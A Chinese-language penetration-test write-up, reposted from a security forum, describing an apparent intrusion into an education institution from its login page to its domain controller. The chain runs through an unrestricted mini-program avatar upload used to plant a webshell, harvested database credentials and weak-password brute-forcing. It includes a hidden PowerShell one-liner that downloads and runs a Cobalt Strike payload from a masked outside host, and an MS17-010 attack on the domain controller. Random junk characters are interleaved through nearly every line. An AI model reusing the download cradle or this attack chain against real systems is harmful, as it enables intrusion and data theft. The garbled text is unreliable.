0 G2 e" \' ^( h2 q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路/ i; W8 p4 D9 Z& {& |3 u
" L' G V$ [/ d& [. \* h
8 z! d; _0 E* B+ s5 j2 R
: N: ^# ?5 i1 C$ t1 _ , o9 S0 T& w. T" N% z7 \$ P
( P* H- s# w$ N 正文
9 u) \" p5 {1 Y2 \* L : x; U4 ^6 T( |9 Q7 U- {2 r( d; P
! `# A8 M0 n' C, b" w# ~+ N l
* D8 L Y3 n8 y3 A* J' z' f$ {
- I/ F, Z3 l# _& ?- J0 q$ ^) C, y
) Q4 Q# k6 i0 [' J: \ 目标:www.xxxx.com(一家教育机构) ' l; x0 s& X# Q n( K9 N
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
& |3 K% ^+ e! W9 q3 r4 C5 D ( b% i/ }% D! a% `( z/ }( f
; Z* ^, ?& l# t F/ d % R$ j1 T9 c; `7 G& O2 d
/ y% P( H3 x t3 n$ H1 v
8 F' d/ b( X3 t9 ]; Z, j
进行了简单的信息搜集 * V5 T" x% O& i) K, v- m
9 U/ Q- Z: T( @8 w: I
8 \% d, p0 j( Q
2 h- E0 g( _" K6 z |
, o" g) g# s; Q/ d$ a1 g 子域名搜集
! s4 U& B1 y2 q, A* r* I p! P! m/ r# P% V# y( [
& v6 n- W( p1 L9 [" C
* q1 H0 b: F/ x1 n5 |* l& T . ]5 y, `! S# ^" e4 d
: y& @. L& N* @/ O fofa找资产 6 C4 b. p: b ` {6 p+ H' n: q& A
0 L. D; ^' `; P# E: o5 a& E
- t/ v; n7 i0 w& p' P3 U. i; _( u
( O+ T, v! p9 w0 h' f
4 B. g8 d8 Z3 B9 B/ `% L! V
, S8 z0 O. x$ t* \ " C% ^5 x' q( j c3 f! Z" s3 ?
; z+ r" w8 @0 K8 z6 }
一共七个资产。去重之后只有两个。
) V! b: l; }% X2 r& x- w9 W
; a7 d8 n: V( k% W
9 |$ c6 |! X3 X; i! A$ t3 S - b+ x# L( ]. R! S0 o5 _
. y; s4 C$ ~" o. ^% S5 [0 Q 目录探测5 V" n2 Q$ A5 ~3 h
! V2 u/ P0 c- r' T( a" d" Y
% P0 }/ Y$ G& F% B
$ V) J# ^. y7 v9 F
4 c' f! O! |0 J/ i# q$ T, d
" g4 g, [# [. Y1 ]6 G$ I 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 x N3 l( E7 e 0 C- m+ r0 N6 [) G1 _" q& U
' x. f" X7 ~1 e
; e$ f. a) o! T6 }. @! |
9 I6 U3 z5 I) j1 q! g; E 我又尝试了通过修改返回包来绕过登录界面
- @3 M7 ~% y" ^! _6 s6 s1 ? - j; t# x4 [' d9 L# q9 P4 M
* a5 U' ]# X' ]" O4 O7 ^: J1 m ! c H! e( ]& f; g' R
- S5 M- i6 F! f) `
5 i0 D0 q; h F/ l2 l! g 还是不行,尝试注入无果
! t- R! B* I6 q u1 v ) @# s" ?, O+ P8 O& l
0 ~% K8 r# @& Q $ C3 ?: G& [3 Y/ u+ p
6 S. O }1 k* s0 e
# W+ j6 ~& c! ?" K, e/ J s
不过我目录探测出了一处Spring信息泄露 * d6 G# P9 D* d
8 c9 U; C2 {, |0 F; y2 R" }3 T6 ^3 e4 { K8 ]. J
/ I$ R' B- b8 ~0 A9 \- y
- `; }- m( f1 |( o. P
]2 E9 Q" R m2 e% P* M : V( _: g0 a: s6 N) R; i1 f
* n6 \) h* [% ~( Y: \ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录7 h) L- P/ q0 q( K
0 v i$ H6 O: G5 D7 w' n: X; b0 U" e+ D2 O6 ]: Z' O5 D% U9 ^# ?
* L: @8 Z$ R8 ?& A; D* W
( c- s4 `& o$ j7 k- W* R: a, O6 w8 ]# n# B
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
[3 r% X1 ]( Q/ N* Y/ U. E0 v' {& z # \+ R& @+ e5 a c& C
4 P) r- z( z5 X0 W: g
- y+ c; v( x# K
+ i+ d7 b I6 V, U5 `, K9 }# D5 Y6 |
获取有些师傅到这一步就手机抓包电脑测了。
3 G) |5 k$ Z3 {8 z9 ?
" M) i# b7 L& E3 T" j! h+ ^# q! ]* r, K; h5 d
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。/ i8 M" v( q2 E! L' E3 n6 u7 Y
( \2 c9 G# |- | F1 V' L
$ v: ?! S3 ]% }4 q
其中在一个公众号发现了小程序,可以进行注册。
: P& \1 j. s; z2 v : L9 g8 e% C$ [
' W8 i2 P* X, q8 k, _ 看到了头像上传,尝试上传获取WebShell# e8 i# P: |: p9 g4 d. E* @: {# ?
1 x/ A* J/ \. s7 Y: H
# |3 h2 `4 k6 b1 l8 n+ M3 t2 c
$ l0 o( W0 u4 l8 v9 P
" Z9 [( O4 Y9 T5 { k3 |" L y
: w, C; r; E4 n( e& k) O 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
- _! R2 g" U8 e5 Y! q6 ?( Z+ M " r8 @& F# d. b4 `3 g, L
& @, ?- J6 B) M' Y4 h
! ^- U+ h; x( h) c# } * L* I" u( `+ y7 m) x. v. I7 O" _
$ m& L: Z) n( y r8 H' u* V* _
然后上了大马9 m6 w; m9 S7 C6 c
/ c: i8 ^* z) ?$ h% y# q) m
' a1 K& K5 Y! R7 r$ v5 D 9 ^5 I" q1 X: D: N
+ R# v% F/ z7 L* i$ Y( V# }9 t$ ?5 L; M5 [0 m: X( A# S
$ I3 u$ e1 p8 A
/ x7 L6 s) t' N, [* X% ^
7 z/ N$ `& o. ?; Y/ b9 l! }1 ? 通过翻找文件发现数据库账号密码$ S/ c; M( P. s& f1 s, r
' v4 |/ `: K1 S. P: I. s
# I) E5 n& l+ [# h" T r( V W/ O( k+ i
" M" M4 P* t1 N2 E' Z
) n! l! k" N% c, e( [5 e6 g4 `0 |# }; K7 f G8 Y# C6 G" S
--内网渗透
% \7 Y! A, u! k$ g4 F. Y m" S5 e+ ~ ( ^2 {& y T( o9 Q0 f6 k4 X
5 g% I% W/ M& D) h* S 直接通过powershell执行 cs上线
$ {9 [5 W* ~ _& ]. H5 I: A
, ?9 D: L5 R& z0 s8 {2 L; B: U) G4 c5 ^4 k3 L/ j0 L3 v; u1 C4 d
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"! `9 B& o/ ~, V( }6 Y
7 n. d& c2 D8 M" H7 U7 ]2 X
" o$ t: ]3 t4 w& [4 i
5 W% M2 r0 h* B/ N# N. a ^& Z6 J 8 e+ ~: g! M' \& C8 W( m
8 R7 I! r; {: y& z9 J! j, T( F
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
( g* b, N" l X6 @! T( X) h 0 T1 j! A4 v0 e) E9 ^2 @! M" X' R6 B
2 F2 b! a/ }0 T4 [5 F0 x
- v' M1 f4 Q$ X0 i5 ^ 1 p$ s- B; L+ A% t
* c- d; z9 N3 O& z" j0 X
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 + B8 ~3 o h# d# a6 V4 j, \2 X
0 u7 T! P* J6 i. T: w! b
9 F2 I6 z7 t% t O$ Q: Z& Q
/ L% ?# }( ?4 C( J, s; R* y
; Q, B" B# Z1 a$ [; ~( K; o0 K: D' L& G, G; k1 n
5 \; L' S1 V* G8 Q# D2 L( ^' l% I& O3 S 7 k; V! W7 H! ]! ]# h: v
& M* [. L; z+ b0 y" a% r W( |
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 $ C8 H; s$ _: y# K1 N
3 k, x5 U9 |9 P3 u: _9 U2 ^8 g/ {4 b+ `; t$ J1 M& Z0 L; [
- F l6 R0 P4 e! V
2 f! p4 l- q" m 9 _- X2 |9 V6 {
6 Y) ^* w# X4 |# o# T l7 S* u- C# o. P/ p, ?% w' e6 D
; r" t7 z w9 h, s5 \3 I/ Y
$ s+ K }( `. ^; Y6 R( @7 Q3 Q9 R% ?, x, H
( [6 h3 D- V0 \3 B0 e4 o" G. Y2 b% g0 ^% w+ \
7 Y* I( }. ]" w9 j! m; ?
, ^# H1 A% Z4 V, r. P; }" m$ [, I/ t, X( ^) {+ h
小结
G3 K, \2 H, n" p H
5 S) g2 o% c% } u0 v) v- v$ V8 A% d- z) M9 y2 `
0 o5 L: {, a9 {* g2 e: x. g# i: Y) V. i
7 P& X1 l3 N* I4 }1 u: M
- p5 F8 i. p' D1 _ n2 n8 R ` 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
/ C3 {8 ~( M' _5 i; t
7 p8 y% }( Z+ _. ^3 J- `$ Y9 n6 k
* G: F& V7 M4 A8 z0 V : I% m, |4 \: U H& i
3 E/ F. v- S3 l# N5 L" d" U1 X
; e, K4 n, z1 F# ~" O -
- Z2 ?6 t1 E4 ^) z : j" m9 ?8 y$ K
e$ b; k8 w- N! N) @$ N - ' u' |$ ?9 K! z- J$ S( J. Q9 D
% _* |+ a% B- |+ h5 x: t! d
1 a2 y7 E0 W. q' l! y: _! R# I 7 ~* v/ X! l$ J% r. p
6 q* y( W' P1 v9 s3 z) S 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
& W8 `7 b0 u4 M$ u$ p ^, Z4 J- w+ F
/ w# w c1 n- e; Q: Z
4 _8 r, Y4 \+ m" p5 h! d' X
|